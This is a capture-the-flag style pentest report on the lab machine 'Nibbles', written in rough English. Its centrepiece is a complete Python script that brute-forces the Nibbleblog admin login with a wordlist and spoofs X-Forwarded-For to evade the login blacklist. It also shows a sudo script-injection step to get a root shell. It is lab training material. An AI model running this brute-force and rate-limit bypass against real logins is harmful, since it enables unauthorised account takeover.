Report - Nibbles Report

1. port scan result

adree	prot
10.10.10.75	22,80

2. initial access - nibbles plugin vulunability

Vulnerability Explanation : i find out that web page use nibbles plugin and find out that plugin version is 3.7. this version has CVE-2015-6967.


Vulnerability Fix : upate nibbles plugin


Severity : critical


Steps to reproduce the attack : using this vulnerability need to id and password. so, i should find out password. i performed dictionary attack to "admin.php" file to login. but, server seem to be blocking client, if client try login over the five times. so that, i used X-Forward-For header. this header bypass client block.

sereenshot :

there is exploti code below :

from random import randint

import requests

# Brute force information
PASSWORD_LIST = '/usr/share/wordlists/rockyou.txt'
RATE_LIMIT = 5
RATE_LIMIT_ERROR = 'Blacklist protection'
LOGIN_FAILED_ERROR = 'Incorrect username or password.'

# Target information
RHOST = '10.10.10.75'
LOGIN_PAGE = '/nibbleblog/admin.php'
TARGET_URL = f'http://{RHOST}{LOGIN_PAGE}'
USERNAME = 'admin'


def attempt_login(password: str, ip: str) -> bool:
    """Performs a login using a given password.

    :param password: The password to try.
    :param ip: Spoof the attacker's IP address with this one.
    :return: True for a successful login, otherwise False.
    """
    headers = {'X-Forwarded-For': ip}
    payload = {'username': USERNAME, 'password': password}
    r = requests.post(
        TARGET_URL, headers=headers, data=payload
    )

    if r.status_code == 500:
        print("Internal server error, aborting!")
        exit(1)

    if RATE_LIMIT_ERROR in r.text:
        print("Rate limit hit, aborting!")
        exit(1)

    return LOGIN_FAILED_ERROR not in r.text


def random_ip() -> str:
    """Generate a random IP address.

    :return: A random IP address.
    """
    return ".".join(str(randint(0, 255)) for _ in range(4))


def run(start_at: int = 1):
    """Start the brute force process.

    :param start_at: Start brute forcing at the password with
     this 1-based index. The number represents the line in
     the password file.
    """
    ip: str = random_ip()
    num_attempts: int = 1

    for password in open(PASSWORD_LIST):
        if num_attempts < start_at:
            num_attempts += 1
            continue

        if num_attempts % (RATE_LIMIT - 1) == 0:
            ip = random_ip()

        password = password.strip()
        print(f"Attempt {num_attempts}: {ip}\t\t{password}")

        if attempt_login(password, ip):
            print(f"Password for {USERNAME} is {password}")
            break

        num_attempts += 1


if __name__ == '__main__':
    run()

result :

i use password at CVE-2015-6967 vulnerability. 

post-exploitation : 

3. privilege escalation

Vulnerability Explanation : there is vulnerability in sudo configure. i can use sudo /home/nibbles/personal/stuff/monitor.sh. i inject reverse_shell into "monitor.sh" file  and excute. but, there is tty error. so, i use - bash i option 


Vulnerability Fix : delete sudo configure


Severity : critical, 

Steps to reproduce the attack :

$ echo "bash -i" > monitor.sh
$ sudo monitor.sh

post-exploitation :